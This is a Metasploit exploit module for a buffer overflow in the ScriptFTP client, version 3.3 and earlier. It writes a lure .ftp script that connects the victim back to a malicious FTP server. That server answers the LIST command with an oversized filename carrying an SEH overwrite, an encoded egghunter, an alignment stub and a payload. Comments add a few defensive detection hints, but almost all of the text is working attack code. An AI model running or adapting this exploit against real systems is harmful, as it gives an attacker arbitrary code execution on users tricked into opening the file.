  # Metasploit exploit module for the ScriptFTP <= 3.3 LIST-response buffer overflow.
  #
  # The class has two halves, both visible below:
  #   * FILEFORMAT side (`setup`): writes a ScriptFTP script file named by
  #     datastore['FILENAME'] that opens an FTP session back to this host and
  #     requests a directory listing.
  #   * FtpServer side (`on_client_command_list`): answers that LIST with a
  #     directory entry whose filename is several kilobytes long and carries the
  #     SEH overwrite, an alignment stub, an egghunter and the egg.
  #
  # Defensive reading of what is on the wire:
  #   * Victim side: a ScriptFTP process opening an outbound FTP session to a
  #     host it was pointed at by a .ftp file, then receiving a LIST entry far
  #     longer than any legitimate filename (> 2 KB from the constants below).
  #   * Server side: an FTP service that replies "200 OK" to every command it
  #     does not recognise, and sends "226 Directory send ok." BEFORE any data
  #     has gone over the data connection (see the ordering in
  #     on_client_command_list) — both are deviations from normal FTP behaviour.
  #   * Presumably versions after 3.3 are unaffected (the title says "<= 3.3");
  #     confirm against the CERT reference listed in 'References'.
  class Metasploit3 < Msf::Exploit::Remote
    Rank = GoodRanking

    include Msf::Exploit::Remote::FtpServer
    include Msf::Exploit::FILEFORMAT
    include Msf::Exploit::Egghunter

    # Module metadata (name, author, references, payload constraints, target).
    # @param info [Hash] base module info merged by update_info
    def initialize(info = {})
      super(update_info(info,
        'Name'           => 'ScriptFTP <= 3.3 Remote Buffer Overflow (LIST)',
        'Description'    => %q{
          AmmSoft's ScriptFTP client is susceptible to a remote buffer overflow
          vulnerability that is triggered when processing a sufficiently long filename during
          a FTP LIST command resulting in overwriting the exception handler. Social engineering
          of executing a specially crafted ftp file by double click will result in connecting to
          our malcious server and perform arbitrary code execution which allows the attacker
          to gain the same rights as the user running ScriptFTP.
        },
        'License'        => MSF_LICENSE,
        'Version'        => "$Revision: 13841 $",
        'Author'         =>
          [
            'modpr0be', # Vulnerability discovery and original exploit
            'TecR0c <roccogiovannicalvi[at]gmail.com>', # Metasploit module
            'mr_me <steventhomasseeley[at]gmail.com>', # Metasploit module
          ],
        'References'     =>
          [
            # No CVE/OSVDB identifier was assigned when this module was written;
            # the CERT vulnerability note below is the authoritative reference.
            #[ 'CVE', '?' ],
            #[ 'OSVDB', '?' ],
            [ 'URL', 'http://www.exploit-db.com/exploits/17876/' ],
            [ 'URL', 'http://www.kb.cert.org/vuls/id/440219' ],
          ],
        'DefaultOptions' =>
          {
            'EXITFUNC' => 'thread',
            'DisablePayloadHandler' => 'false',
          },
        'Payload'        =>
          {
            # Bytes the encoded payload must avoid: NUL, 0xff, CR, backslash,
            # forward slash, LF — presumably because the filename is handled as
            # a path / line by the client (TODO confirm against the original advisory).
            'BadChars' => "\x00\xff\x0d\x5c\x2f\x0a",
            'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
            'EncoderOptions' =>
              {
                'BufferRegister' => 'EDI', # Egghunter jmp edi
              }
          },
        'Platform'       => 'win',
        'Targets'        =>
          [
            # CALL DWORD PTR SS:[EBP-4]
            # scriptftp.exe - File version=Build 3/9/2009
            # 'Ret' is only two bytes: the SEH record is written through the
            # Unicode-expanded path (see the unicode_mixed pass and unicode_nop
            # below), which is presumably what widens it — TODO confirm.
            [ 'Windows XP SP3 / Windows Vista', { 'Offset' => 1746, 'Ret' => "\xd6\x41" } ],
          ],
        'Privileged'     => false,
        'DisclosureDate' => 'Oct 12 2011',
        'DefaultTarget'  => 0))

      register_options(
        [
          # Name of the ScriptFTP script written by `setup`.
          OptString.new('FILENAME', [ true, 'The file name.', 'msf.ftp']),
        ], self.class)

    end

    # Writes the ScriptFTP script that points the client at this server, then
    # hands off to the FtpServer mixin's setup (the `super` call) to start
    # listening.
    #
    # The script connects with user/password "ftp"/"ftp", enables passive mode,
    # fetches a listing into $list and closes — the GETLIST line is what causes
    # the client to issue the LIST handled in on_client_command_list.
    def setup
      # When bound to all interfaces, ask Rex for the local address that would
      # be used to reach 50.50.50.50 — presumably the default outbound
      # interface — so the script carries a routable address rather than 0.0.0.0.
      if datastore['SRVHOST'] == '0.0.0.0'
        lhost = Rex::Socket.source_address('50.50.50.50')
      else
        lhost = datastore['SRVHOST']
      end

      ftp_file = "OPENHOST('#{lhost}','ftp','ftp')\r\n"
      ftp_file << "SETPASSIVE(ENABLED)\r\n"
      ftp_file << "GETLIST($list,REMOTE_FILES)\r\n"
      ftp_file << "CLOSEHOST\r\n"

      print_status("Creating '#{datastore['FILENAME']}'...")
      # file_create comes from the FILEFORMAT mixin; it writes ftp_file under
      # datastore['FILENAME'].
      file_create(ftp_file)
      super
    end


    # Replies "200 OK" to any FTP command the FtpServer mixin does not handle
    # (USER/PASS/etc. from the script), so the client proceeds to LIST.
    # Detection note: a server that returns 200 to arbitrary commands is a
    # strong sign of a fake FTP service.
    # @param c   the client connection
    # @param cmd [String] the unrecognised command verb
    # @param arg [String] its argument
    def on_client_unknown_command(c,cmd,arg)
      c.put("200 OK\r\n")
    end

    # Handles the client's LIST: opens the data connection, sends the 150/226
    # control responses, then pushes a directory listing whose filename holds
    # the overflow buffer.
    # @param c   the client control connection
    # @param arg [String] LIST argument (unused)
    def on_client_command_list(c,arg)

      conn = establish_data_connection(c)
      if(not conn)
        c.put("425 Can't build data connection\r\n")
        return
      end

      print_status(" - Data connection set up")
      code = 150
      c.put("#{code} Here comes the directory listing.\r\n")

      # NOTE: the 226 completion reply is sent here, before any data is written
      # to `conn` further down. A real server sends it after the transfer; this
      # ordering is an observable tell.
      code = 226
      c.put("#{code} Directory send ok.\r\n")

      eggoptions =
      {
        :checksum => false,
        :eggtag => 'cure'
      }

      # `hunter` is the small search stub, `egg` the tagged payload it looks for.
      hunter, egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)

      # Encode with alphamixed, then unicode mixed
      [ 'x86/alpha_mixed', 'x86/unicode_mixed' ].each { |name|
        enc = framework.encoders.create(name)
        if name =~ /unicode/
          # aligned to ESP & EAX
          enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
        else
          enc.datastore.import_options_from_hash({ 'BufferRegister' => 'EDX' })
        end
        # NOTE: we already eliminated badchars
        hunter = enc.encode(hunter, nil, nil, platform)
        if name =~/alpha/
          #insert getpc_stub & align EDX, unicode encoder friendly.
          #Hardcoded stub is not an issue here because it gets encoded anyway
          getpc_stub = "\x89\xe1\xdb\xcc\xd9\x71\xf4\x5a\x83\xc2\x41\x83\xea\x35"
          hunter = getpc_stub + hunter
        end
      }

      unicode_nop = "\x6d" # DD BYTE PTR DS:[ECX],AL

      # Next-SEH and SEH record; each is two bytes here (see the Targets note).
      nseh = "\x61" << unicode_nop
      seh = target.ret

      # Stack-alignment stub executed after the handler fires, interleaved with
      # unicode_nop so it survives Unicode expansion.
      alignment = "\x54" # PUSH ESP
      alignment << unicode_nop
      alignment << "\x58" # POP EAX
      alignment << unicode_nop
      alignment << "\x05\x12\x11" # ADD EAX,11001200
      alignment << unicode_nop
      alignment << "\x2d\x01\x01" # SUB EAX,1000100
      alignment << unicode_nop
      alignment << "\x2d\x01\x10" # SUB EAX,10000100
      alignment << unicode_nop
      alignment << "\x50" # PUSH EAX
      alignment << unicode_nop
      alignment << "\xc3" # RETN

      # Filename layout: 656 filler, hunter, filler up to target['Offset']
      # (1746), nseh, seh, alignment stub, 500 filler, egg. Total length is
      # therefore well over 2 KB — the size anomaly a defender can key on.
      buffer = rand_text_alpha(656)
      buffer << hunter
      buffer << rand_text_alpha(target['Offset']-buffer.length)
      buffer << nseh
      buffer << seh
      buffer << alignment
      buffer << rand_text_alpha(500)
      buffer << egg

      print_status(" - Sending directory list via data connection")
      # Unix-style `ls -l` lines. The second and third lines are written as one
      # entry split in two (the third lacks the leading '-'); these are the
      # exact bytes the original sends and are left unchanged.
      dirlist = "-rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"
      dirlist << " 5 ftpuser ftpusers 512 Jul 26 2001 A\r\n"
      dirlist << "rwxr-xr-x 5 ftpuser ftpusers 512 Jul 26 2001 #{buffer}.txt\r\n"

      conn.put(dirlist)
      conn.close
      return
    end

  end
  169.  
  170.  
  171. # [2011-10-09]
  172.  